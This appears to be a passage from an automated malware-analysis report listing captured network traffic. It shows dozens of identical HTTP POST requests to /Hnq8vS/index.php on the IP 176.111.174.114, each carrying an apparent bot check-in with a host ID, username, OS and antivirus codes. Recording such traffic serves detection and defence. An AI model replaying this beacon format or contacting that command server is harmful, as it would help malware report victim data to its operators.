                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
